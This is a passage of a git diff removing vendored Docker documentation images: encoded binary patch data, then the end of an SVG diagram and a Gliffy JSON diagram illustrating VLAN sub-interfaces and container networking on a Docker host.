z?)E3!mMk5G5K4sx%>E`#WAZ0sl3d^Q$J@mmV$t>0g4BG4_>bM64d8oB1YJ65SI|}XnodMBgWbaKzxJQI_?a(SC6hSaSC6PjS3Sys<~Kr(di<~axaTe) za%Hw;r*#TBwCP%3Uo~;Q*)Af+HL~`&f5kcw9!*fzA8$9hki&vnbf2gx1HBGmr|LM$ z`@(Q`VlT9|BD@v0Osq%F*-}u*{5BzxKyc2M9V4oaBegp$`47kKyy)DwQ~J0LHDgA< zWb{EidaHNwHT|vMa~t-2Gd1GWO{fiz5JM=PAwnfkh0g9Ip9Y|WhQKM@UhRN&zPk@N8r}r7J%{fLmcR1XAlPz_PNfc zN|&SLZ2SxtKn_ed>cZM?j3(z@Qm?d4)VR4vJw<`8@OM1x#Ov9;B4#0E z4CVXs=_V=k1>gaGm2iPJZer)vq&w7Rk~oroQIV1gDlmHf{dclgvQ{qtxXoV)uLOSo zX z`CSXah0|4bZk|}UxVTK^cZ*IjP{%t|mFVyBDa8>G@=YnA?} zgD-#oF`fg9bI3JQN;mGX!GD)EonafCDf15VB z)D+V|i~tOxT6z3HYWbn_=c%>V)#cXDDJOGk&}$O{_XS^I7lH zZEVp1(PsD0r`Rw_kove#YX1(JL{n_7*`@jA$u>0>>W$>ND>KqKq}Ht`T13M%;lh2>dyc6VNPYTEIH1cr}Y|Ey8a zfu>QWO3t&dD+t;#Tx*{x3V3SpLH znu1t~d;FK-b@fQC*lQb(x=k21XO9pwH19Lwo9W8IV#p? z)@G&1;m!p8%7LJ(odTd%R+6>fYmz}chCuq(_Lj@nv-j4-x4~*4?9!r|4BSn}f|#r} z757FHa_Ywi5}df-E^S<|xZt8dV3W^5h}cR~{!AaF(d@Kv{RC)ZGv(ZLcp z>sU1pq%7n3Sj+l@fW>QXStG|drHMNll$Zv(q8sCI+I7Mt_aIJ2_zUE0RA#$Sksm8* zLS{KD)hPk)JS<899bTtfq+w`e_-!V{Oi_1@LNp>r$i|;qZ}Bt(@>wcUfsK!QZ^9x9 z_e;2Q>_Fo&8N^H-8 zA7?b&6>{I6&U#vRSdcO|)ETV+wGWAZjIbLuHj?RRL+P;Y)3ybw&ihi0u9rr6AKMkd zba9PkWo4O&L+UclrXF?+$x&-~LB=;Ky?qNcSMUjAX|ZzJY{J+s)~5OZUeu}bcM`9>7?7d0=Zy6~Y5~94 zHqIZ;oY`_Syah{NYlV+)xxLbXQR{atN zIkMpwHgL#z4=J50!Dc?&wXv>)7$HMBt7CZu2jv^_Kczn7(1g|>M9{YLw$Z^$q18?$l*f4Wg2Z`&Fwa|Jt$vzDtSl(R}P5tzI;DyAEYm=!kN>vXVM zxLuUebn3b{#i>s;%+;=b+%mbjhkDqg&Ov{*dEWQmfOm%?U3FWGbGg9R6i{sE`9>gklS7l4J#-RNg@sMFv zFyxqk_j_}|yMn6^V6`9&O%fuBY+4vDglCVl03$43_eIrxG5UqsL_NYGr@W}du2sAA zJIPSItk%GGA%bI~tWpaAC_?AG>x01TfDfNEe%T!jTL)_W>F}(oo@^*Zr>gIt#{R1VDuD*$^ zS|^}(ASNZ!>3VV@mM#QKDN4F}YVQpcARb++%x$%xZut*r`?qmc*7{NQu*dPp?ZHdC zGK#U56sz=K8-&)azkSK-oU`JM1VP{p1EX(}lUClsuKt+=C$BH(#vn=zgRmJ9#-%GE7dn}3|Q3kb|bt{!lG9d=icF zdhScP!jO%;3j8_&aZ$v*7%YL#;q=;{czRtFkMoHc2TCv-1?mGp})8NX4wIBz#d+Vuzl-*M#%(@81e)fgR>XUs^{(gVPM6UW*HV=EHlZO`8neF-+F z(hW;?u>OfdAFfaBd=)8hlv6)C$zs8c*(;jvPyJ+{nks%9>~hZ{=w=++HL-^rG8)8P>9tK$gml8CJrcltW;q!$snXiI{NYh0I8LFyWkilaW; z@n(xXY**z11v*RJ#^7q5{uOjWhH>_QU#F&-eDbtO;{!f6^+>2y56M>*gcftib0;aqY@-M!r#9+Q~ykQjU9PcrZfBmixm0dA| zhBYEv-$N4$8B4%5A5C%1tN>`RDQ5z++>P}43Hn@7$|t>C^=!&3$le`FvShp=u8k#7 zN{MeDNG_)7ywzuBI{@ej5#4bW-sm=1J7#Xb2>~6(o2GPgJ9sxse2D6Aj52kP@q9j* z@+i(ceOU6>SH_J~3H_eldKBhBK9+Tm{KgRYTmH-MquX>Ta8?Xf#F{aE;)lhj z5!JBC9m4*o$!R`{J7JY@D{}dsTJ`%eJTtIh&n1BGbQ*d@tGTHdjH%$z>l+@Sj*-d` zymFLDSD)iZNZ@Bf+=#r`t+hilrAJDneHKuurwiYSXq=pOt$0OS#H6qBhAhQK{u_xbl*gJZZGdYFlkn>Ys&Qn( zYVG5UZw}feXdn&wr!XSdi8}R6Tw|RQ&9Ym6-uHE*0$l}4C*OkIBu??oL7hwdL)IoSBB*R8Npahnzhc4b!tgvLS2o2 zTBl>?8SUah1Zwob3#$ik~fqlk!&e$)ydh zHnA*+)`U5eU8uTZPe!Brw&=-=HbvV(@BX#&|0+KYgLt&BlwC_xy0skCzX znZLO9skp03F}sKHN+&)nN#%<2>#Mvd_*H#E+^iZv0DQ~xx=X$91zn~-pRjz7ygbO< z@;e~+QgB-%6w|9zCs>}dzzLO@ROrm{h(z|W}+I28RQh#bHKL>C$FP( zysKRD(zYLRc|*-ixJb>w_BK*rh{@oK(-X?@sUctdRn{kr-XU2h2^J)?hId$t!WyO> zkMc9?-*Rb*8+%?u0eP$@UB)8jSZ2YU-3L|$(|n7;y!wvKFW0i--cL^O>lgj7YbrWb z42H0h71M5^Gv$0#*&=2<>CG;7au&oY_jAvE{5hMchsalPrjTvNNmS+#DMY^ataq+u z3rh$K|HZ)8_jZGcj5@$k@_U8PMk%!8B&=#ZhPQySrAbD#o`r@v!d!yVh6f+hE*Q^d zI*5Hfp8Q*dpT~zCS+a+aeg}pQuvOqft9ANcf;zSFSI{u;Kd4vJZkfm_%vo&75ekrq z8C{%Xw`uX^w@f-Jh6Ney?6W-R=wQxrwrmlkqBft+F-p4~MF(Jw0uUxr|3$#GLfkXd z^SCZBT{q~*+D1`bAPO`LvG0K0Lh;%i+&qAj9I~?fSOA5Dwo+$2xa9|i+5vB8uRlCP zI-J}J#@zBkU2d*+PdctPS7)>Do0@R0rM`#1f@+2vJud)l$+T@PD*v9}e{SPgYKcW- zdM;)b+%>wc?Cyk|eY!m0Gu}DPsXxA(d$QOq;oitTot7=Gi^IO=6@UhT@?39)uPx-1J`Os4e9@z2rmQrg zpVTmE^QR4wVm04w=`l`?oI})yow?Z+nMs(KTZDBIVxrWM(TB-70AfEliWk0edWuNq z_uDOmr36-nH!}F9_7QLpa)<@`J!fhipPE#LgRRNjnI@;9douW>DUQ!fr5uM@a(H4G zK2~B?@qIt5Skh2=qiPEWWOmA@M9yMzDaXgasOsE%6N50@Iz>@nbiA%E{RMOnWo)$e z5~j|PX&ZuHp`C1p5(1^&=o=e`OTUHQB1m@wMWfeb9}O`1bzVGtEy32|Cgd=#b&f{Oy+ z6*O<2DB!v2`F=S2`Res_Pl3Zi|3a=|UUfKXeVj(wImSB)Iui?yL*B?2;5va-VS|iq z939WEAZONQ1po}Iz<7-Jdp0f$4-8xRD7?_AwqIY5<>L@CGj4tkx~4$NWc)%sPt&N~qvk=b27kYF#3R=f3R6 zjhe(b)T6Z)GfZq-;9;tOnuk{Lp&c%8)(+7g^HwInMm-Q+&W52CNV53x6^5E`lg_B7PDr0APkyIFh-025+IhOK zYF&SH_mRT$qg zLSFMAkW+789n3H3{Ef@PhS>F}E5GQ@`t6lu(_iaVfcU`p(Nentf zA)7yK1krNUjpj0rN!h4!U z-re*S;|zDfG~im$Vcird>%{i*a2RwKRao_B z>B|cbi7kId^Ck5$qXpDyd~)snpTS>Wb||4{PrjTCM%T%6?i}}#Zk;XD*SlI~FyJ-w zGo-~ChiAPO89IyC9CnpbE%gC?RBQ`~8rguj5h$5edOsCl;4b(M@?wze*wp(B21On@kQuRuP$T zcaphyj@XJnKaL+G6ptvpT1FCA@qE~5g&_1)^5Knek^z zK+{*rErU0tCTxq|A?-;pFu;j5Ftg^x<7WW`G0L{>LLYFBcqMn;;eh z1^`+c@er_h3gHM<(|+o-T9#*bNSnd+L zQcN&90+Bz!+c@fD0ARjHi=Jb#m)9RKg4+w&iQ!!)kgIhDg1em?gld-MPfY@D{wURG zGO4*N*h%?q^@QU#HX`bu*1$VSGAiRJ-T;6!$o>U^F!hhUR9QqYnry0u2Gv-`SHK|j5pYZb;ubgZ3QGOtNlN&%6+S$qx&Zl25mP znzw_lw_}Ifntm^_qAaj1&60F^f2p$oa{2>i*Hi0=dGq5wn(+25p4ZKS`M@&0gkY9q zeZL!S^N0lhz41uR$Ka(gx1jru8vpG@>qMC;NNm0F+I=2kgMUp$ew;w<(L#Dn$?4kT z-zn~Ex0OZs2JQv7|HhF0i#Rt7Fgh4L*BmS%d^;MRFLUu>`l*)nwkyn|PxnDuY zGpO}ul99p=s+#_DQ*_U0xa_;JpA|~y!=yR5YJeW#L7)!K#S$Ke*a{m*tlh$Kx*4J} zOOjz$Gn?T@4R~cVH&YKYTU$!5FjVGmcU(u@x#WPr`pK=`D(^U?Oi#*VInO7J6-;$| z=M8R^$6tnW=Ke5VdzPGloQtjD|J#ZA)~0~NvxAfmcih(CQCX5K_F|t2_{ibWB^~-G zI4%f_nIrD>g?+q$~yTO{oSoY&%qqirY5sjACfNXvo8zz

b*{Hq>az{aEwl^vuL-ETW!AsvC0U0rmZ$_<6OOxU4rH z6u*cCCrj%CbZzu?LCU+fGt1_K0=ic0aiH8Tv(d}mzpAB)%@%6-6`Lyn zd;=aEyurlO2oEI|CPfQU*p&b-f0^7f+aySv?;0IYmhE8@&azM@s(W+tZ9c5e4!{sX zfiaPRB-x>31b(-@*OX3SfPO={;5>XR!!5^M3})_?`eW3RYLFL4dn&gCRlddq!UZp3 zAO=>+?ALa2%k{;xrD-8Kl++6_#b$F=O!pn7J1$t#B@!$C5)BfdlU5HN(yJrQ%j!dq}rfM(a$o8fv zTp~yzd4j8p6OX6R;`GAwKclI1Fc=V2d+jG|XGUoRj0-i(!+O4aQ6eJQWJVRWoER@>i z1n>F0IMxw9Tw>{kK1i)xicm&1#D5gu{o>fIFIqAt;KD8L+_HrIBbg;wPdL84HblQ)C+~sF>=()-`U*es#QL*>k3l!ZIIv@K;?LQ#Ty`{4Un&{&BHwE!4CHY8s zb9=V6y1JT|m)G4blMWT&;|nz-WC)pfM6;rDh2LXBA-h@)ttSbpP#BK2EA@3v!))k_I4*8zu-(cSeUL5Bkr5o$S)*>_9hh!9tbP63Ei-@-I*%W`U5q{cz|E*9v&Qg5%&dt z8!AqBkj06l=i^H)WY~-BjUhDa&H65JxDC=MS2hEuZ%EK2A?7il=<>wG#%6A#1e`7} zo5c3NGd9MIpFdt|q97+9fkL^>J9E;~(sFV}If_$KQp(F&<9&f+WOeBp)6DcfK(mM& ze>?Fg>6w+b&jHPHL|?21Nq6=$)R_j15nrFPD&Eh{H+?w}3v;%(RKEj$S!Mmq@NT8ky{N_Eq*cDRbAP`cP^8&pSqLb}@=d)^ojf1TGW= zuDwy*%gkJ?v!NjzhLx@$bKNNM;+5*d$YJ{zRg=C4TI5VM%m4OPr0(G0(9qICd@hXL z6;g5pN&P^^55gwB`9sbgRWKHhJBqdJyXfNrVPqfmezre`PZKHj!qWT@RALZRSPem- z5^p>^3k%wi;p4v4Z=Si@6@b5-guorPcC*_oI4o%WW^tQ)ge-JewU zoM=ex0>Ge^j5r+xnPav+yv)pKieCIzX%!U}w>)7m)}-_ukaFHzgi{wn7|G+5d1`x{ zr0MDDe;+en1TZl%d6)d(P0|sYq|2Usd$A8zE|HZaJf;mTq1MY{WzY(4=jWC?_Z)ui z@>{sQ6=vuSQ-CWdD5!~KaGABg4jtowUSD0oe{hF#+VlZ6_-BZIr3cSO`wR8M!;{5P z&L`WkhATD9p3M{ij5184NkCuY_wR=axPKtim(fa;f|ateva@{@{tu8YWZ2ay=;maF z@I8Y{2+_`OGnrC+00CB2FlwY`K?fuLs|<{990C|AWwK^5>2yB&!-s3o^|_v60eW*D zIjtPRgt>3DR2cA-q_psKZU(LJb|M7&gXFocbeWR(9K=jXv^Lt>+AmBjhJYXLEZjwN z+nG?T)i-~9YWJt}VS|-;lcg9Ywm)@XEfNnH|K<+Qy|wV4V^-iM73T;2p2BISVy&?R z+1aH=A{%|~ffA*ZDM)@p;7A)n;Gi}8<&9~TNoV)C((aRbW?*bgQDa%hL7|zz%%BzP zuZ%##mOR&z{*e+*!tvud{eI$Xe0+SIGM?-7tqIz>evMhj2x3da=m*aUR&H)TZ=~T$ zd9w*K#Vqo7GbmxG5D`KfMypV%*cRFuFp1Th#7&c_utafC6s0V@hnSEh6l=z zyt|W)LV62R*F7WzlgwF660sK-1E$zj*x_n>RjMHUIn zT8DC98iDbqIji4HQ0M-xXPE&3r(Lq+XgHPm=VWNyYhSJuNN)-bXyYYA4KX}?A-WZN zb>rEFp@zUGz?aO1V9cg zUQ<9y0QWk|6g3&X#u-3#Q6+3YbxzWQ4Ypf`Hc&YieLT8y*|r}!5T0qtpq1Oc+OD4C ziyrZ5{q-B}`y>Zb62pg))goLh&hEpb72S9zFOnb6KRi8D{r<8C1+?27}e0s3aI$1Q*m6Z`| z$9mVvQ^)P17IbJq=TXIentF%@*UeafK^jUZM zY%xzfxFw$W;#g%ScC@RLJViv{{DLp_=ziV&AZ?_bDw%!_85R^+K&$c+cC`b7;gf^! zdkf+K++yzA!7U(VlTN^zS(Dh!w$apvnxHq?H_9PLvkrmBv6taxYGR@0E&bY$Jxn`^ z=%9sJCCM_P>1ycq+bfLYH{4p6!&4Tkb*@^gP_cSk(^iEz7E+LhakO54^8zbDujJO_*>BO_v$z zj4LH+Ds`DR|4;;TMfm!oSDjZ-&`LOgx+g|WEv+_0b z`B9yb=ef5Ik~F%XVxI9y;y5N!Nll=ggAuL{8xrbj76_0td5R|R>l;2Cfzn=3!d;Tg zH0#m>fYa6$rzGjzU3HJ%hU1Bn!%yO6*k-7#&+0A@tKgsc{ck9_A!uFh7yJE-kH^XH zthZn0>y9|4+em&Hl=vTnhm_+q(-x^$JEaDWqgv>riK>>G`411%0U!7QNTNZop)^vXVh`0e*yCO;tD%bx59ow#0oplpi`6f zY~gW~ldgiAr6oZJSpww3S40G^TrRSUENHG~msvj@=;JJ-b1j`ZSji?Ee zLTl2nAyhWMHZ3iUzksZ{!}?{2zVfqu5>Y~5@~9WF(^_a;b~E&z=QvCjw|5WNejE?; z{%reMvCHi`dto8d?R}82^=I3&WL#s(LB292YEg%0BERP|DVnt?s>gftiWB$s=Nbvd z=SUbyI<#ttj~x{S{u2T!Q2RFLG*^wk1i9**7zqh7h@5Gl>9xo#|6N~n$3bb;6VgFN zUzJ8^$nWgB*Ikyg?flq8)>h{1cvk?-rpolPY!0(GM!SOzXP)Y2)R$YiF3cd026Zgt zC$-2(vYvx-rJwev4#xy9N*bz{jirO3CfZV~CgeytlXU)Ef;V1Vt6J?s=q7 z=djU<1Y;vHrhH(A>JE~{)8;^F*eLe7O7b%gL#p|Ep;tpwO&~;P>{6;M#4_XfS--bT zEYZIdr}5mCRMMM&O}DlQ6Ni^>a7I$R%&KRyH7)Pr_G{OY?5)>8+e3}RjDg&&Hhxi12ACsFKf`f z7oYv-$yT{+T$4%p1=MQOd3No39a3SnDEYVOLS7{rc{wd@iSWE>-p@m$%r#o02ziO% zxSH&+4z!y~N?Q zoNX(k9_6Cxns2M!L>{r^m_I8Tcf zb}|n5Q3iXZAGJYRPf|ojKYn^}?zDp~9{^7qdg++dm&hou72(25PwkVg{v+vvH1|(V zZTY~N<{za>gyBEcYJXDDYhUqd5=9N`TIFpYkmjC}Wv0L1QF^n3MhFlZVwMZM8>jvG zc8j=_#^DgaDeevn1;A16ClmhZUAZw+BJO|7GvJ0_=j9@hPU0u26PbDX zQwosiGyh(|WsVhbh7B7VSM#^2+bq^7=g9m=hABYDPgecGAu$(OENNcD;k)pY6W93} z{o=)u5!DB6WD$7xgnuu7CS28A_MgzhT{@DDctf8{@&8fwUBv4B?w2@UQwv)(U58s+ z>L-e-FMaZbnb5scP*iU^!5_+F|`*or!y+O+GPRrl6W9d9hq!*i@F(^6WPi+`|1oe#XHM#V8H?3VEHJp-9MA2BWM&*oupsHc!G$ zIl7T+C&KU#W><18`npZ12wP^0?we&E%f*<#SDY9E*M>ei&)MOq5yfCnX@Y`f~9Nw$HcbW(91%)zevdoylqjmA@%P2At{~42)X&EiW?+*+-4v4Ycp!@dWvw zDgBqLm`+2=~Fdb&CFawyt!AknMLEA8XK%Aupv%7KBaJv3dUU~F zDnhkLRK0fs$mi3UOTj*Aqy7ON6&X^UKXq(73j#;3Um*(6a7w=Eb&`O@KbAb|FG5l5 z@1^u!`!0@ondd;Z;zY&k>0abQ{OZ~A%;vBnGk7d#l4-^k?+a$ESC=ES;2A|LIw+sG zov|H??43x6y?*(tHMoJ0&o49co4MN#Rz_Y6vX6e z-(5!8HguEgP@N24RWa6d`e#;0fe(FSLq%Bx^b6%W3e2L;B^-)861&F4|)pMSa)fA5d%70C71M6))P z@6i^+GmhDfM`)-_;NQtQtm#tp>BTTUxJM5ND88t#K~=eB4*1M?e{-tjjU*7!-i@fI z1OK@F9K%`!K$E_XgkzH6ncXhYx+T$6AO;}gM<%e&Bg)$WXxf1q8@o*ynQp zYOfb;D0%56T7))UhDk!_V{bZDXuC|Hatfm5`Sk|heaUkQ4+GhwK!Ady$P(q>(9pkb zXk=u>^>o|eHA?VUb+Q?^S-X9b&=9V~`K1fl4;eWigu`zNPn6y5&tIe;*}Ov(ut@TM zQG6T}*(ppat0YdXMG1(TCjEyY5rKi}HS#1o;&8mf4~Y}wxFj4D1pp`?RzP^Q*`u1^ z+7CH=y)dE^(W%v>rJTa3etdjF^$1sc`vS!2@rb?P}6)hsEi*@mn$*rsZ z*JfPQrK6anuKW4(vrA?lGMd2=a|$k6h-LJAAtTMlC75cSiZj&6P7!sI%c0aCFCn&_ zaw0M}v%sR}WI`hFLD>DRdboJN4l-IZz@+>2#LXSmU)?JFXaW!aQqmm<)w~WAnW$&8 zO06QprL)YG)PHgvYRjT^Cx2nrbs!rfMl1Wtp(E@8wGf-nc%bO#NzDYpej0D?x4Vl5 z>m)%{(S?aP5eP~xF_48ah}6gc{lcH2I-?jlkMGVt+md@3Yx}V)kSbG6R&v++l4&6SN}?GZ zRdZTx5P5hf?(j7jkpe_LZf8E*#8~F#!JL+s`~$ggf;}>kXtlZ;G5`Fg%3Njq=b<&l zU>uvr=7(hE?<{hSeL-8xBbhI9>Yytcel^R1t$?rf&cX~r`L^i=o=O^IOom_Dd{qUJ zail2X-MQHDJkJBL`vp2MOTG)`p?pgp>l(&y%MI_{_LSQNCk`w3YSyDK0DjbJ@_kjH z;~sf4NKJJ26B_xmzpX--4KG(+W{l;!bSMkmne469Ugk|SEIl8^SpJSU@$a*kq(bN30OYWo%wjL35S$m2|v-vCEV z9;fQiEDv%U61L=z%FBOS5sN7^W_wf@xm}`e6~Qx(V3xYgj5KlI_KNU67`+1Y1GMbU zJCM?69K(%tleG#o%!G9113xSRR8o@6+FDyr)PDtYxdf^ND7r|>3+m2t;eOlHAbwrs zbw8)tp{`?#N>Hy>Vw#I7(z02B0x^N^}%SwYLlWp@+i|) zatj!bQnjjCdTV?pg>rnxS44WT0OEQfm>^wgO2=?0i6_}Y_~e$TTEI%|SPD1@R>bq< zg2`!ar%7_C%Kl<)qLZQSw{jsf^Jc+~V#S-%V{$ng&!1vV3q-tD?feCew$g(`diU5! zW=HzyUb}&!#!sNpq;x+tBf*c`0eX-_G$KL-Wq=;r!YaE6?I+d zJP4v zYwZ20rc)i-xvV)D@&Z76bEK3vf9%rU&<65}(H%_@)zH<-)#%-2Dn595eqv$TAnBkM z^?WTC_!ofY$wQ{V_+6uP$VBR2BBM`Sg;4ED@K2Etf1mSu{D-HS(;C?LO{??a92!_V z^fEQ&{q6@vX}el^h4NG4kf=6kDcv)sPjqb5d5K=xaT0#lv=c#($wC>ad^E@~Mm@Gg z*#Dobs?9oLE`6UK;Mo!1-gn+^VhULP-@Na-+)QVz4a;9j(o@sY!kuLImJ|A44rgn` zIu*tSH};M!Wk)1otS&LGhX;^ipQFMHRsVIpn(Nv(l(f-B@=!QB7Ef`Ftz2%qq+RF( z?YerZIHz%hxh0M{&AUy=+ar(f#0%E`)axho@(%&|?>IU;FY$xcE`Odt=|Q8V#;qCF^rc~|!; z$03QC1fa!sN2;rnk3x_e@|#I(4czUYba3DZ(ZWR-w~yzV%!jnS zI=|~Z2r@9^K6cOV9SQpw{wF37N%lAT=kQO~$#=au6eB#p?KtpWTcCmd!iM34ElUM` zT%NWTfA6=o639Q!#xt%X%4G|l@4IemhMEa^QItX%L_qY$Ma<64;qt#U2v=WU9$EjA z9y*uPxeXDO#I3#AAZpSPWa_)nnPJ12t%$=BrW6EHBz%c#iB`PC#H;UpUmx|IqEa}R z7rrqO^$_=QQo2H5f_61(&4qg)TW+IrnFGPhZ{~x4OK4gEcN(vBVXo1T=ck8fCUp6g%z?@m#P*^>KMXZd7=E>JyreSU^X zm&dee)0)ofFnxNm&F9I#?R$;Wa-}&AZ>SGmSY7Xaa?bw=^DkUntS0V%@Z1ESqs_;8 zB%Kt!IXVxTp73@|usNa7{M#zezDcJxbX|GuADdvInV)}7{OoD<@}Bi=_79OW>$m?g z`@eA2+2Y#lhUZV79p>-|Dl~EXVb}it@|S0quN(C$Xw0z|zW3|pzC7=e*S+%Ht15O} z@PGbzli_EFo6LXr8F5J6UioSE_0JD~Z_+CHU^$2X`F*{(@yrtv}nS5&!vBR_42NAzV-A%y8Q(dUenH`-^_q-7HNxz5MeY)8FOa zr*FOXrR@Ixx_i}SR>BV~r~Y)K1J1J{=R9QKWpYm{_9*M9=UPf z#iNJjFFzo6UDuJ@{{7O=r)w`>J9m0ZzP{XlyB||7|J(VuaDhQ-V3hUo-W%6agW2V_ zWJdk46ezQe-oO8ud;g7vb(?Rxn7;qL{e#Wx+}mI`=qZ5}=ncW#H{L8@?Uj_5D>q|nKA5%jk{U=wX7;6)2FF{BBqTqj@vwYd~H*~w%fp*k;|sH>+@1|w*I$?a-V1P zd+48%X}y>+<)EMxODP*S$b{vqQy*sV>MiBYSk->?!91O=^h+_kcTZn8ykpo_c_!IT zX|G7RN!Ox^y1HxWv*+ip+-container1 -vlan10192.168.1.2/24eth0 -802.1qtrunkNetworkRouter (gateway)vlan10 -192.168.1.1/24vlan20172.16.1.1/24vlan3010.1.1.1/16eth0.10eth0.20container2 -vlan20172.16.1.2/24container3 -vlan3010.1.1.2/16eth0.30DockerHost \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy deleted file mode 100644 index 4d9f2761c4..0000000000 --- a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy +++ /dev/null @@ -1 +0,0 @@ -{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":566,"height":581,"nodeIndex":500,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":-3,"y":-1.0100878848684474},"max":{"x":566,"y":581}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":-5.0,"y":-1.0100878848684474,"rotation":0.0,"id":499,"width":569.0,"height":582.0100878848684,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":103,"lockAspectRatio":false,"lockShape":false,"children":[{"x":374.0,"y":44.510087884868476,"rotation":0.0,"id":497,"width":145.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":101,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network & other

Docker Hosts

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":157.40277777777783,"y":108.18042331083174,"rotation":0.0,"id":492,"width":121.19444444444446,"height":256.03113588084784,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":99,"lockAspectRatio":false,"lockShape":false,"children":[{"x":-126.13675213675185,"y":31.971494223140525,"rotation":180.0,"id":453,"width":11.1452323717951,"height":61.19357171974171,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":57,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#38761d","fillColor":"#38761d","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-121.4915197649562,-156.36606993796556],[-121.49151976495622,-99.52846483047983],[-229.68596420939843,-99.52846483047591],[-229.68596420939843,-34.22088765589871]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":289.82598824786317,"y":137.23816896148608,"rotation":180.0,"id":454,"width":11.1452323717951,"height":61.19357171974171,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":55,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#38761d","fillColor":"#38761d","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[291.05455395299924,191.93174068122784],[291.05455395299924,106.06051735724502],[186.27677617521402,106.06051735724502],[186.27677617521402,69.78655839914467]],"lockSegments":{},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":372.0,"y":332.0100878848684,"rotation":0.0,"id":490,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":97,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":9.5,"rotation":0.0,"id":365,"width":141.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":98,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

 Parent: eth0.30

VLAN: 30

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":342,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":96,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#eb6c6c","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":52.0,"y":332.0100878848684,"rotation":0.0,"id":489,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":92,"lockAspectRatio":false,"lockShape":false,"children":[{"x":1.0,"y":10.5,"rotation":0.0,"id":367,"width":138.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":93,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Parent: eth0.10

VLAN ID: 10

